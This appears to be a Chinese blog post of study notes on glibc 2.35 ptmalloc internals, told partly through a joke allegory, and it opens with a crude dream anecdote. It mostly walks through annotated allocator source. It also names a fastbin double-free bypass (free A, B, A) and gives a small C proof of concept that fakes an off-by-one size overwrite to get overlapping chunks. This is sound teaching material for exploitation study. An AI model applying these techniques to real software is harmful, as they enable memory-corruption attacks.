看看你的斌

11月8日的梦

11.8睡到下午1点才醒,做了一个特别沙雕的梦

小时候上的厕所长这样,两个高台中间一个坑道

要么站在一侧尿, 要么跨蹲拉

我梦里上了个厕所,这个厕所的坑道很宽,一米

我上去几乎要劈叉,本来不想跨蹲的

但是旁边好几个小朋友

我立刻就跨蹲,小朋友就跟着学

然后就都掉下去了,然后小朋友就溺水

我正好在水流上游

爽死我了

我在上游可劲儿造矢

斌家の故事

乱斌,小斌,大斌是斌家三兄弟,同处一个屋檐下

快斌是叔辈兄弟,自己另住

这四个傻斌各自开了代销处, 负责倒卖一种叫做堆块的货物

最初斌家是一穷二白的, 客户只能去头块批发市场亲自拿货

客户用完了的货, 斌家闻着味儿就来拾破烂儿了

快斌性子很急, 喜欢直接抢. 快斌不满足的话, 是轮不到斌家三兄弟的

剩下斌家三兄弟中, 乱斌负责进货, 拿回来后和大斌小斌分货

快斌性子很急, 管理货物简单粗暴但是颇具条理, 他找了10个桩, 每个桩上用铁链拴大小一样的货, 栓了10长串

乱斌非常不条理, 他自己的货随便乱放, 每次找货都得扒翻半天, 用山东话说就是屑包蛋

小斌就比较条理, 他按照货物大小把货分成了62个箱子, 每个箱子里放大小相近的货

大斌最条理,他不光分了63个箱子放大小相近的货, 如果小箱子空了他还会从大箱子里拿大货拆小然后放到小箱子

因此乱斌知道自己不是理货的料儿, 会及时把货分给大小斌管理, 自己集中精力进货

但是由于快斌喜欢抢东西, 好端端的大货可能被他抢成好几个小货, 这时候如果客户来要大货, 四个斌谁也拿不出来, 也就是形成了外部碎片

这就尴尬了, 什么斌家四飞舞

因此快斌会在此时被制裁, 乖乖交出所有货物组成大货给客户

然而有一天客户嫌斌家四兄弟太飞舞了, 另找了个擦车斌(下简称擦斌)作代理商

擦斌比快斌还急, 急得跟🐎一样, 快斌都抢不过他

这一下子老斌家的生意惨淡了许多

格立北克帝国吸取了快斌乱抢的教训, 搞了个反垄断, 前七个货让给擦车斌, 之后的货还是由老斌家经营

图偷的pwncollege

本文参考Glibc2.35

meta-meta-data

本节介绍元数据的元数据,也就是整个ptmalloc的宏观结构,也就是斌の家

更具体的说就是如下两个结构

结构体	作用
malloc_state	分配区,管理fastbins,bins等元数据	重要
malloc_par	分配区配置文件,记录tcache桶子容量,最大块大小等配置信息	不是很重要

malloc_state

malloc_state是ptmalloc中的宏观元数据结构, 其对象被称为“分配区”,比如main_arena就是主分配区

在多线程环境中,可能存在多个分配区,以应对并发的分配请求

管理着各种bins的元数据信息,比如链表附加头节点的位置

struct malloc_state
{
    __libc_lock_define(, mutex);

    int flags;

    int have_fastchunks;
 
    mfastbinptr fastbinsY[NFASTBINS];			//fastbins

    mchunkptr top;								//topchunk

    mchunkptr last_remainder;					//最近一次分配剩下的堆块指针

    mchunkptr bins[NBINS * 2 - 2];				//unsortedbin & smallbins & largebins

    unsigned int binmap[BINMAPSIZE];			

    struct malloc_state *next;					//下一个malloc_state

    struct malloc_state *next_free;

    INTERNAL_SIZE_T attached_threads;

    INTERNAL_SIZE_T system_mem;
    INTERNAL_SIZE_T max_system_mem;
};

bins[0]
bins[1] => unsorted bin
bins[2:63] => small bins
bins[64:126] => large bins

其中fastbins是bins的缓存,类似于tcache

static struct malloc_state main_arena =
{
  .mutex = _LIBC_LOCK_INITIALIZER,
  .next = &main_arena,
  .attached_threads = 1
};

主分配区(main_arena)是malloc_state的一个实例,是一个glibc的static对象

默认情况下进程只有一个线程,也就不会有并发的动态分配请求,那么只需要有一个分配区,也就是main_arena

在glibc加载进入内存之后,main_arena被创建,并且初步粗略地初始化一下,

对各个bins的初始化需要等malloc_init_state被调用,该函数会在首次动态分配前调用

如果有多条线程

那么就可能有多个分配区,各个分配区通过next指针组成环状单链表,

在应对并发的动态分配请求时,会沿着next指针找到一个空闲的分配区满足需求

主分配区初始化发生时机

init采取懒加载机制,只会在第一次使用到动态分配函数如malloc或者calloc等时才会被调用

printf等一些I/O函数也会调用到malloc申请缓冲区,导致init发生

void *
__libc_malloc (size_t bytes)
{
  mstate ar_ptr;
  void *victim;

  if (!__malloc_initialized)			//初始化整个ptmalloc堆管理器
    ptmalloc_init ();
    ...

static void
ptmalloc_init (void)
{
  if (__malloc_initialized)				//避免重装
    return;

  __malloc_initialized = true;			//标记已经初始化

#if USE_TCACHE
  tcache_key_initialize ();				//此处初始化tcache key, 该key用来缓解double free
#endif

	...

  thread_arena = &main_arena;			//主分配区(main_arena)是一个static模块变量
	
  malloc_init_state (&main_arena);		//对主分配区进行初始化

主分配区初始化内容

1.bins 的每个头初始化指向自己,表示桶子里没有空闲堆块

2.[主公技][锁定技] 对main_arena设置fastbins最大堆块大小不超过0x80 (包含元数据)

3.初始化topchunk桶子头指向unsortedbin

static void
malloc_init_state(mstate av)
{
    int i;
    mbinptr bin;

    /* Establish circular links for normal bins */
    for (i = 1; i < NBINS; ++i) // NBINS = 128
    {
        bin = bin_at(av, i);
        bin->fd = bin->bk = bin; // 最初时,各个bins链表头都指向自身
    }

#if MORECORE_CONTIGUOUS
    if (av != &main_arena)		
#endif
        set_noncontiguous(av);		//看不懂
    if (av == &main_arena)		//主分配区的fastbins最大存放0x80的堆块(包含元数据)
        set_max_fast(DEFAULT_MXFAST); // 0x80
    atomic_store_relaxed(&av->have_fastchunks, false);

    av->top = initial_top(av);			//初始化分配区头块,指向unsortedbin桶子头
}

这里对topchunk的初始化效果是,topchunk指向unsortedbin桶子头

1 2	top = 0x7ffff7fa6ce0 <main_arena+96>, bins = {0x7ffff7fa6ce0 <main_arena+96>, 0x7ffff7fa6ce0 <main_arena+96>,...

malloc_par

分配区配置文件,只有一个实例mp_,位于glibc内部,在glibc加载时即完成初始化

static struct malloc_par mp_ =
    {
        .top_pad = DEFAULT_TOP_PAD,
        .n_mmaps_max = DEFAULT_MMAP_MAX,
        .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
        .trim_threshold = DEFAULT_TRIM_THRESHOLD,
#define NARENAS_FROM_NCORES(n) ((n) * (sizeof(long) == 4 ? 2 : 8))
        .arena_test = NARENAS_FROM_NCORES(1)
#if USE_TCACHE
            ,
        .tcache_count = TCACHE_FILL_COUNT,
        .tcache_bins = TCACHE_MAX_BINS,
        .tcache_max_bytes = tidx2usize(TCACHE_MAX_BINS - 1),
        .tcache_unsorted_limit = 0 /* No limit.  */
#endif
};

pwndbg> p/x mp_
$15 = {
  trim_threshold = 0x20000,
  top_pad = 0x20000,
  mmap_threshold = 0x20000,
  arena_test = 0x8,
  arena_max = 0x0,
  thp_pagesize = 0x0,
  hp_pagesize = 0x0,
  hp_flags = 0x0,
  n_mmaps = 0x0,
  n_mmaps_max = 0x10000,
  max_n_mmaps = 0x0,
  no_dyn_threshold = 0x0,
  mmapped_mem = 0x0,
  max_mmapped_mem = 0x0,
  sbrk_base = 0x0,
  tcache_bins = 0x40,				//tcache有0x40个桶子
  tcache_max_bytes = 0x408,			//tcache中最大能放的堆块大小
  tcache_count = 0x7,				//一个tcache桶子中最多放7块
  tcache_unsorted_limit = 0x0
}

斌s

unsortedbin,smallbins,largebins实际上位于同一个数组的不同下标位置

1
2
3

mchunkptr bins[NBINS * 2 - 2];				//unsortedbin & smallbins & largebins
								//NBINS = 128
								//bins[254]

bins共有254个元素,但是实际上是127个桶子头,每个桶子头占用相邻的两个bins元素

这个桶子头挺奇葩的,名义上桶子头是一个malloc_chunk,然而实际上一个桶子头只有fd和bk两个指针有效,其他部分和前一个桶子头重叠

typedef struct malloc_chunk *mbinptr;

/* addressing -- note that bin_at(0) does not exist */
#define bin_at(m, i) \
  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
             - offsetof (struct malloc_chunk, fd))

可以看到bins[0]既处于bin_at(M,1)->fd的位置,又处于bin_at(M,2)->prev_size的位置

而实际上桶子头并不需要prev_size和size这两个属性,只需要前驱后继指针就可以了

因此bins[0]扮演bin_at(M,1)->fd的角色

bin_at(M,0)								//无效
bin_at(M,1) => unsorted bin				//1个
bin_at(M,2~63) => small bins			//
bin_at(M,64~126) => large bins

fastbins比较特殊,是上述三种bins的缓存器,自己使用一个数组

1	mfastbinptr fastbinsY[NFASTBINS];

Topchunk

topchunk是杂货市场

最初斌家一穷二白, 用户从头块杂货市场直接拿货, 用完了释放的时候, 斌家的乱斌来拾破烂儿, 然后拿回家和大斌小斌分赃

此后用户优先从斌家拿货, 斌家没货才会去头块杂货市场拿货

algorithm

如果各个bin都没能满足分配请求,那么只能请topchunk出山

这是ptmalloc堆管理器能够拿出的最大内存块了

快斌Fastbins

datastructure

fastbins实际上是一组单链表, 该单链表的所有附加头节点位于列表fastbins列表中

fastbins中共有10个单链表

显然每个单链表中存放大小相同的堆块,具体来说,堆块大小到下标的映射为:

fastbin_index(sz) 
	= ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
	= ( sz >> 4 ) - 2 
        
 
#MAX_FAST_SIZE     
	= (80 * SIZE_SZ / 4)
    = 160

NFASTBINS  
    = (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
    = fastbin_index(0xb0) + 1
    = 0xb0 / 0x10 - 2 + 1
    = 0xb - 2 + 1
    = 0xa

fastbins idx	mem_size	chunk_size
0	0x10	0x20
1	0x20	0x30
2	0x30	0x40
…
6		0x80
…
9	0xa0	0xb0

然而实际上只能用到前7个,也就是[0:6]这7个桶,这是分配区初始化时会限制最大fastbins堆块大小为0x80(包含元数据)

然后在_int_free函数中会检查当前堆块大小
1
2
3
if ((unsigned long)(size) <= (unsigned long)(get_max_fast ()){
    //尝试使用fastbin
}
如果当前堆块大小大于0x80则不会通过该检查,也就不会往fastbins中塞

如果调用set_max_fast(s)重新设置global_max_fast值,使其大于MAX_FAST_SIZE,也是不可以的
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#define set_max_fast(s) \
  global_max_fast = (((size_t) (s) <= MALLOC_ALIGN_MASK - SIZE_SZ)	\
                     ? MIN_CHUNK_SIZE / 2 : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))

static inline INTERNAL_SIZE_T
 (void)
{
  /* Tell the GCC optimizers that global_max_fast is never larger
     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
     _int_malloc after constant propagation of the size parameter.
     (The code never executes because malloc preserves the
     global_max_fast invariant, but the optimizers may not recognize
     this.)  */
  if (global_max_fast > MAX_FAST_SIZE)
    __builtin_unreachable ();
  return global_max_fast;
}
直接__builtin_unreachable

algorithm

快斌可能去这几个地方进货:

1.free时tcache未启用或者已经充满,并且堆块不是mmap堆块,并且大小在快斌管理范围内,并且快斌缺货, 那么快斌会留下这块

free

当对应堆块大小的tcache被填充满之后,如果还有相同大小的堆块释放,会先尝试放到fastbins中

在x64上,默认情况下,小于0x80(包含元数据)的堆块,才会被塞到fastbins中

//_int_malloc.c
unsigned int idx = fastbin_index(size);								//size换算桶下标
fb = &fastbin(av, idx);												//桶子头节点

/* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
mchunkptr old = *fb, old2;											//*fb是桶子头原来指向的第一个chunk

if (SINGLE_THREAD_P)			//如果当前进程只有一个线程,那么显然只会使用到main_arena,不会有其他分配区
{
    /* Check that the top of the bin is not the record we are going to
       add (i.e., double free).  */									//唐氏一样的DF判断
    if (__builtin_expect(old == p, 0))								//当前释放的p是否和上次释放是同一块
        malloc_printerr("double free or corruption (fasttop)");
    p->fd = PROTECT_PTR(&p->fd, old);								//头插法上链,后继指针也使用SafeLinking
    *fb = p;														//桶子头到堆块的指针是裸的
}
else
    do
    {
        /* Check that the top of the bin is not the record we are going to
           add (i.e., double free).  */
        if (__builtin_expect(old == p, 0))
            malloc_printerr("double free or corruption (fasttop)");
        old2 = old;
        p->fd = PROTECT_PTR(&p->fd, old);
    } while ((old = catomic_compare_and_exchange_val_rel(fb, p, old2)) != old2);

这里有一个非常唐氏的二次释放检查
1
2
if (__builtin_expect(old == p, 0))								
    malloc_printerr("double free or corruption (fasttop)");
意思就是本次释放的堆块和桶子里最后一次释放的堆块不能是一个

那先free(A)然后free(B)然后free(A),就饶过了

注意到返还给fastbins的堆块,不会消除下一堆块P(Prev in use)标志,这就导致堆块合并时不会牵扯到fastbins中的堆块

malloc

一次malloc请求,可能发生两件事:

1.如果fastbin对应桶子中有空闲堆块,把fastbin中相应桶子中的头块返回

2.如果tcache对应桶子有空,再把fastbin中剩下的相应大小的堆块塞满tcache对应的桶子

if ((unsigned long)(nb) <= (unsigned long)(get_max_fast()))
{
    idx = fastbin_index(nb);                                            //大小换算下标
    mfastbinptr *fb = &fastbin(av, idx);                                //桶子头
    mchunkptr pp;                                               
    victim = *fb;                                                       //桶里的第一块

    if (victim != NULL)                                                 //如果桶里一块都没有,就别在fastbins中废话了,滚蛋就完了
    {
        if (__glibc_unlikely(misaligned_chunk(victim)))                 //对齐检查
            malloc_printerr("malloc(): unaligned fastbin chunk detected 2");

        if (SINGLE_THREAD_P)                                            //如果是单线程则将头块拆下来, 次块成为头块
            *fb = REVEAL_PTR(victim->fd);
        else                                                            //如果是多线程, 则调用REMOVE_FB宏将头块拆下来
            REMOVE_FB(fb, pp, victim);
        if (__glibc_likely(victim != NULL))                             //正常情况下应该就拿到了一块
        {
            size_t victim_idx = fastbin_index(chunksize(victim));       //再检查一下拿到的这块大小是否合格
            if (__builtin_expect(victim_idx != idx, 0))					//检校一下这个堆块是不是插班生
                malloc_printerr("malloc(): memory corruption (fast)");
            check_remalloced_chunk(av, victim, nb);
           ...
      
      //////////////////////////////////////
      ////////////尝试缓存至tcache////////////
      //////////////////////////////////////        
               
      void *p = chunk2mem(victim);
      alloc_perturb(p, bytes);											//堆块在给用户使用之前,把其中的数据全都擦除,防止信息泄露
      return p;

实际上如果编译时开启了USE_TCACHE选项(默认是开启的),

在本次分配请求拿到堆块之后,在返回之前,还会先尝试把fastbin中的剩余的同样大小的堆块缓存到tcache中,直到tcache塞满或者fastbin空

#if USE_TCACHE                              //如果使用tcache, 下面要把fastbin中的堆块尝试缓存进入tcache,为下一次分配加速
            /* While we're here, if we see other chunks of the same size,
           stash them in the tcache.  */
            size_t tc_idx = csize2tidx(nb);                             //计算nb大小的堆块,在tcache中的下标
            if (tcache && tc_idx < mp_.tcache_bins)                     //判断是否在tcache范围中
            {
                mchunkptr tc_victim;

                /* While bin not empty and tcache not full, copy chunks.  */
                while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = *fb) != NULL)//检查tcache对应桶是否有空间
                {//while终止的条件,要么是tcache被狠狠塞满了,要么是fastbin一滴也不剩了
                    if (__glibc_unlikely(misaligned_chunk(tc_victim)))
                        malloc_printerr("malloc(): unaligned fastbin chunk detected 3");
                    if (SINGLE_THREAD_P)
                        *fb = REVEAL_PTR(tc_victim->fd);									
                    else
                    {
                        REMOVE_FB(fb, pp, tc_victim);
                        if (__glibc_unlikely(tc_victim == NULL))
                            break;
                    }
                    tcache_put(tc_victim, tc_idx);//再塞一个
                }
            }
#endif

malloc_consolidate

由于fastbins中的堆块不会被合并,处于一种不彻底释放的状态,可能导致外部碎片增加,比如假设某一时刻堆内存布局如下

1	[64B @ smallbins][16B @ fastbins][64B @ smallbins]

总计有144B的空闲内存空间

对于一个128B的请求, 却因为中间fastbins中的堆块不能被合并,而得不到满足

因此malloc_consolidate函数的职责,就是适时清理fastbins,尝试合并出大西瓜来,减少外部碎片

外部碎片:

多次无规律的分配与释放之后堆内存中出现很多小空洞,

小空洞可能加起来有较大的空间,但是实际上不连续,不能满足一个真正的大空间申请

内部碎片:

因为元数据以及对齐因素,导致堆块实际大小大于所需大小所造成的内存浪费

malloc_consolidate发生时机

malloc_consolidate用于清扫fastbins中的黑户

可能发生的时机:

1.malloc请求不能在tcache,fastbins,smallbins中得到满足,并且此时fastbins中至少有一个堆块

else
  {
    idx = largebin_index (nb);
    if (atomic_load_relaxed (&av->have_fastchunks))		//当fastbin中一旦有堆块,av->have_fastchunks就会被置位
      malloc_consolidate (av);
  }

2.当使用topchunk进行分配仍无法满足时,考虑到fastbins中的堆块可能合并到topchunk,以扩大topchunk,可能满足分配需求,因此此时也会尝试


    victim = av->top;
    size = chunksize (victim);

    if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
      {
	...//使用topchunk可以满足需求
        return p;
      }

    /* When we are using atomic ops to free fast chunks we can get
       here for all block sizes.  */
//topchunk无法直接满足需求,尝试将fastbins中的黑户合并到topchunk,在下一个循环时重新尝试使用topchunk分配
    else if (atomic_load_relaxed (&av->have_fastchunks))
      {
        malloc_consolidate (av);
        /* restore original bin index */
        if (in_smallbin_range (nb))
          idx = smallbin_index (nb);
        else
          idx = largebin_index (nb);
      }

    /*
       Otherwise, relay to handle system-dependent cases
     */
    else		//到此说明fastbins已经全杀了,如果还不能满足分配需求,说明ptmalloc已经捉襟见肘了,需要系统调用brk,给堆区扩容了
      {
        void *p = sysmalloc (nb, av);
        if (p != NULL)
          alloc_perturb (p, bytes);
        return p;
      }

3.在free时如果释放的堆块非常大,大于65536个字节,也就是64KB,并且此时fastbins中有东西,也会发生,目的是把fastbins中的黑户杀了,能合并到这个大块儿的就合并,然后调用munmap缩减堆区

  if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
    if (atomic_load_relaxed (&av->have_fastchunks))
	malloc_consolidate(av);
...

4.malloc_trim被调用时,子函数mtrim会进行malloc_consolidate,这个malloc_trim作用是削减堆区空间返还给操作系统

然而在glibc中并没有找到该函数的调用者,可能是提供给开发者手动管理内存用的

static int
mtrim (mstate av, size_t pad)
{
  /* Ensure all blocks are consolidated.  */
  malloc_consolidate (av);

malloc_consolidate的效果

零帧起手,直接宣判fastbins中的堆块死刑

1	atomic_store_relaxed (&av->have_fastchunks, false);

意思是本函数执行完毕之后,fastbins中将无人生还

具体干了啥呢?

从小到大遍历fastbins中的10个桶子,对于每个桶子:
	如果桶子为空则continue
	如果桶子不空:
		遍历该桶子上挂的每个堆块,对于每个堆块:
			· 如果物理上相邻的前块空闲 则:
				向前合并,并将前块从其所在bin中unlink拆下来

			· 如果物理上相邻的后块不是topchunk 则:
				如果该后块空闲 则:
					把后块从其所在bin中unlink拆下来,
					当前块向后合并
				如果后块正在使用 则:
					后块的P标志归零
				挂到unsortedbin上
				
				
			· 如果物理上相邻的后块是topchunk 则:
				合并到topchunk

maxfb = &fastbin(av, NFASTBINS - 1);
fb = &fastbin(av, 0);   //迭代遍历fastbins中的每个桶子,从第0个桶子开始,到最后一个
do
{       //从小到大遍历fastbins中的10个桶子
    p = atomic_exchange_acq(fb, NULL);
    if (p != 0)     //桶子非空
    {
        do
        {
            {
                if (__glibc_unlikely(misaligned_chunk(p)))
                    malloc_printerr("malloc_consolidate(): "
                                    "unaligned fastbin chunk detected");

                unsigned int idx = fastbin_index(chunksize(p));
                if ((&fastbin(av, idx)) != fb)
                    malloc_printerr("malloc_consolidate(): invalid chunk size");
            }

            check_inuse_chunk(av, p);
            nextp = REVEAL_PTR(p->fd);

            /* Slightly streamlined version of consolidation code in free() */
            size = chunksize(p);
            nextchunk = chunk_at_offset(p, size);
            nextsize = chunksize(nextchunk);

            if (!prev_inuse(p)) //尝试向前合并
            {
                prevsize = prev_size(p);
                size += prevsize;
                p = chunk_at_offset(p, -((long)prevsize));
                if (__glibc_unlikely(chunksize(p) != prevsize))
                    malloc_printerr("corrupted size vs. prev_size in fastbins");
                unlink_chunk(av, p);
            }

            if (nextchunk != av->top)       //尝试向后合并
            {
                nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

                if (!nextinuse)
                {
                    size += nextsize;
                    unlink_chunk(av, nextchunk);
                }
                else
                    clear_inuse_bit_at_offset(nextchunk, 0);

                first_unsorted = unsorted_bin->fd;  //挂到unsortedbin上
                unsorted_bin->fd = p;
                first_unsorted->bk = p;

                if (!in_smallbin_range(size))
                {
                    p->fd_nextsize = NULL;
                    p->bk_nextsize = NULL;
                }

                set_head(p, size | PREV_INUSE);
                p->bk = unsorted_bin;
                p->fd = first_unsorted;
                set_foot(p, size);
            }

            else                        //合并到topchunk
            {
                size += nextsize;
                set_head(p, size | PREV_INUSE);
                av->top = p;
            }

        } while ((p = nextp) != 0);
    }
} while (fb++ != maxfb);
}

小斌Smallbins

bin_at(M,2~63)这个范围是小斌

datastructure

带附加头节点的双向循环链表

桶子头到堆块的指针是裸露的

堆块之间的指针是加了密的,真是加了私权

algorithm

小斌可能去这几个地方进货:

1.使用malloc时,如果轮到乱斌出力,如果乱斌发现自己管理的堆块实际上是小斌的范围,乱斌会扔给小斌

malloc

if (in_smallbin_range(nb))
{
    idx = smallbin_index(nb);
    bin = bin_at(av, idx);

    if ((victim = last(bin)) != bin)					//至少有一块
    {
        bck = victim->bk;
        if (__glibc_unlikely(bck->fd != victim))        //类fastbin检查DF的唐氏方法
            malloc_printerr("malloc(): smallbin double linked list corrupted");
        set_inuse_bit_at_offset(victim, nb);
        bin->bk = bck;
        bck->fd = bin;

        if (av != &main_arena)
            set_non_main_arena(victim);
        check_malloced_chunk(av, victim, nb);
#if USE_TCACHE              //类似于fastbin使用tcache缓冲的方法
        /* While we're here, if we see other chunks of the same size,
           stash them in the tcache.  */
        size_t tc_idx = csize2tidx(nb);
        if (tcache && tc_idx < mp_.tcache_bins)
        {
            mchunkptr tc_victim;

            /* While bin not empty and tcache not full, copy chunks over.  */
            while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last(bin)) != bin)
            {
                if (tc_victim != 0)
                {
                    bck = tc_victim->bk;
                    set_inuse_bit_at_offset(tc_victim, nb);
                    if (av != &main_arena)
                        set_non_main_arena(tc_victim);
                    bin->bk = bck;
                    bck->fd = bin;

                    tcache_put(tc_victim, tc_idx);
                }
            }
        }
#endif
        void *p = chunk2mem(victim);
        alloc_perturb(p, bytes);
        return p;
    }
}

如果不考虑tcache,那么相应一次malloc请求之后,smallbin长这样:

乱斌Unsortedbin

algorithm

乱斌是斌家的进口部长,大斌和小斌的货,都是乱斌给的

乱斌可能从这几个地方进货:

1.当fastbins中触发了malloc_consolidate之后,如果堆块没有被合并到topchunk ,那么其归宿就是unsortedbin

if (nextchunk != av->top) {
...
  first_unsorted = unsorted_bin->fd;
  unsorted_bin->fd = p;
  first_unsorted->bk = p;
   ...

2.在free时,如果堆块不是mmap的,并且tcache,fastbins都没能留住堆块,并且堆块没有被合并到topchunk,那么其归宿就是unsortedbin

else if (!chunk_is_mmapped(p))
{

    if (!prev_inuse(p))         //尝试向前合并
    {
        prevsize = prev_size(p);
        size += prevsize;
        p = chunk_at_offset(p, -((long)prevsize));
        if (__glibc_unlikely(chunksize(p) != prevsize))
            malloc_printerr("corrupted size vs. prev_size while consolidating");
        unlink_chunk(av, p);
    }

    if (nextchunk != av->top)       //尝试向后合并
    {
        /* get and clear inuse bit */
        nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

        /* consolidate forward */
        if (!nextinuse)
        {
            unlink_chunk(av, nextchunk);        //向后合并
            size += nextsize;
        }
        else
            clear_inuse_bit_at_offset(nextchunk, 0);

        /*
      Place the chunk in unsorted chunk list. Chunks are
      not placed into regular bins until after they have
      been given one chance to be used in malloc.
        */

        bck = unsorted_chunks(av);      //挂到unsortedbin上
        fwd = bck->fd;
        if (__glibc_unlikely(fwd->bk != bck))
            malloc_printerr("free(): corrupted unsorted chunks");
        p->fd = fwd;
        p->bk = bck;
        if (!in_smallbin_range(size))
        {
            p->fd_nextsize = NULL;
            p->bk_nextsize = NULL;
        }
        bck->fd = p;
        fwd->bk = p;

        set_head(p, size | PREV_INUSE);
        set_foot(p, size);

        check_free_chunk(av, p);
    }
}

3.在malloc时,如果从unsorted中切割了一个大块满足一个小块的分配请求,那么剩余块会被重新挂到unsortedbin中

free

如果一个堆块被free之后,既没有被tcache,fastbins留住,也不是mmap映射块,那么此时该堆块可能有两种归宿:

1.物理上与topchunk相邻,合并到topchunk

2.不与topchunk相邻,挂到unsortedbin上

[不太可能发生的]如果该堆块过大,超过fastbins合并阈值(64K),会触发堆内存缩减

else if (!chunk_is_mmapped(p))			//非mmap映射区
{

    if (!prev_inuse(p)) // 尝试向前合并
    {
		...
    }

    if (nextchunk != av->top) // 尝试向后合并
    {
		...
        bck = unsorted_chunks(av); // 挂到unsortedbin上
        fwd = bck->fd;
		...
        p->fd = fwd;
        p->bk = bck;
		...
        bck->fd = p;
        fwd->bk = p;

        set_head(p, size | PREV_INUSE);
        set_foot(p, size);

        check_free_chunk(av, p);
    }
    else // 合并到topchunk
    {
        size += nextsize;
        set_head(p, size | PREV_INUSE);
        av->top = p;
        check_chunk(av, p);
    }
}

malloc

当tcache,fastbins,smallbins都没有满足一次分配请求,可能是请求大小太大,或者哥仨穷的叮当响,反正就是没满足

为了利用局部性原则,unsortedbin中有一个指针last_remainder,也就是最后一次切割unsortedbin中堆块后剩下的部分

外圈循环
	内圈循环遍历unsortedbin,对于每个unsorted中的堆块:
		如果是unsorted中的唯一堆块,并且该块是last_remainder并且这块足够相应请求 则:
			继续切它,*返回*需要的,留下多余的
		否则可能有如下情况:1.这块不是unsorted中的唯一块 2.不是last_remainder 3.不够大   此时应:
			把它从unsortedbin上拆下来,然后:
			如果大小正好满足请求
				如果tcache未满,则放到tcache中
				如果tcache满了,或者未启用tcache,则直接*返回*
			否则如果大小在smallbins范围内,则放到smallbins中
			否则大小在largebins范围内,则放到largebins中
			如果被放到了tcache中,此时从tcache中拿一个*返回*
    内圈循环结束
                
	如果申请大小在largebins范围,则尝试使用largebin分配
	如果刚才的largebin没有满足请求,则遍历更大号的largebin中找
	如果还没满足,使用topchunk分配
	如果还没满足,使用sysmalloc分配
                
外圈循环结束

exploit

overlap

#include <stdio.h>
#include <stdlib.h>
int main(){
    size_t *p1;
    size_t *p2;
    p1 = malloc(0x400); // usable(0x400) + header(0x10)
    p2 = malloc(0x40);  // usable(0x40) + header(0x10)

    size_t *p1_size = (char*)p1 - 0x8;      
    *p1_size = 0x461;       //suppose off by one ... 
    printf("p1: %p\n", p1);

    free(p1);			//in unsortedbin
    p1 = malloc(0x450);

    printf("p1: %p\n", p1);

    return 0;
}

root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# gcc overlap.c -o overlap -g -w
root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# ./overlap
p1: 0x5600128e52a0
p1: 0x5600128e52a0

大斌Largebins

bin_at(M,64~126) => large bins这个范围是largetbin,一共有63个bin

bin内堆块大小相等

bin之间分了6组,组内各个bin堆块大小成等差数列

组	个数	公差
bin_at(M,64~95)	32	64B
bin_at(M,96~111)	16	512B
bin_at(M,112~119)	8	4096B
bin_at(M,120~123)	4	32768B
bin_at(M,124~125)	2	…
bin_at(M,126)	1	…

datastructure

假设largebins的bin_at(M,63)目前的状态如下:

largebins
0x400-0x430: 0x55555555dba0 —▸ 0x55555555dfe0 —▸ 0x55555555d340 —▸ 0x55555555d770 —▸ 0x55555555cb00 —▸ 0x55555555cf20 —▸ 0x7ffff7fa70d0 (main_arena+1104) ◂— 0x55555555dba0
pwndbg> x/6gx 0x55555555dba0
0x55555555dba0: 0x0000000000000000      0x0000000000000421
0x55555555dbb0: 0x000055555555dfe0      0x00007ffff7fa70d0
0x55555555dbc0: 0x000055555555d340      0x000055555555cb00
pwndbg> x/6gx 0x55555555dfe0
0x55555555dfe0: 0x0000000000000000      0x0000000000000421
0x55555555dff0: 0x000055555555d340      0x000055555555dba0
0x55555555e000: 0x0000000000000000      0x0000000000000000
pwndbg> x/6gx 0x55555555d340
0x55555555d340: 0x0000000000000000      0x0000000000000411
0x55555555d350: 0x000055555555d770      0x000055555555dfe0
0x55555555d360: 0x000055555555cb00      0x000055555555dba0
pwndbg> x/6gx 0x55555555d770
0x55555555d770: 0x0000000000000000      0x0000000000000411
0x55555555d780: 0x000055555555cb00      0x000055555555d340
0x55555555d790: 0x0000000000000000      0x0000000000000000
pwndbg> x/6gx 0x55555555cb00
0x55555555cb00: 0x0000000000000000      0x0000000000000401
0x55555555cb10: 0x000055555555cf20      0x000055555555d770
0x55555555cb20: 0x000055555555dba0      0x000055555555d340
pwndbg> x/6gx 0x55555555cf20
0x55555555cf20: 0x0000000000000000      0x0000000000000401
0x55555555cf30: 0x00007ffff7fa70d0      0x000055555555cb00
0x55555555cf40: 0x0000000000000000      0x0000000000000000
pwndbg> x/2gx 0x7ffff7fa70d0+0x10
0x7ffff7fa70e0 <main_arena+1120>:       0x000055555555dba0      0x000055555555cf20

那么画到图上长这逼样

线条颜色	指针
蓝	fd
绿	bk
粉	fd_nextsize
黄	bk_nextsize

实际上largebin可以看作双向链表, 又加上了跳表索引

双向链表

跳表索引

附加头节点bin_at(M,idx)只有fd和bk指针,没有fd_nextsize和bk_nextsize跳表索引

所有堆块首先按照大小降序排列成双向链表

1	[0x421]->[0x421]->[0x411]->[0x411]->[0x401]->[0x401]

只在相同大小的堆块簇的首个堆块上建立跳表索引,指向下一个大小不同的堆块簇

链表+跳表

binmap

binmap用于在largebin的中加速查找更大的非空的bin

binmap 是malloc_state的成员,4个int,实际上就是一个128位的位向量

1 2	unsigned int binmap[BINMAPSIZE]; //unsigned int binmap[4];

i 就是根据堆块大小落到的largebin下标idx

1
2
3

#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))		//标记下标为i的桶子中有至少一个堆块
#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))	//标记下标为i的桶子中一个堆块也没有
#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))		//查看下标为i的桶子中有没有堆块

比如

mark_bin(m,63) 
	binmap[63>>5] |= ((1U << ((63) & ((1U << 5) - 1))))
	binmap[1] |= (1<<31)
	
mark_bin(m,64)
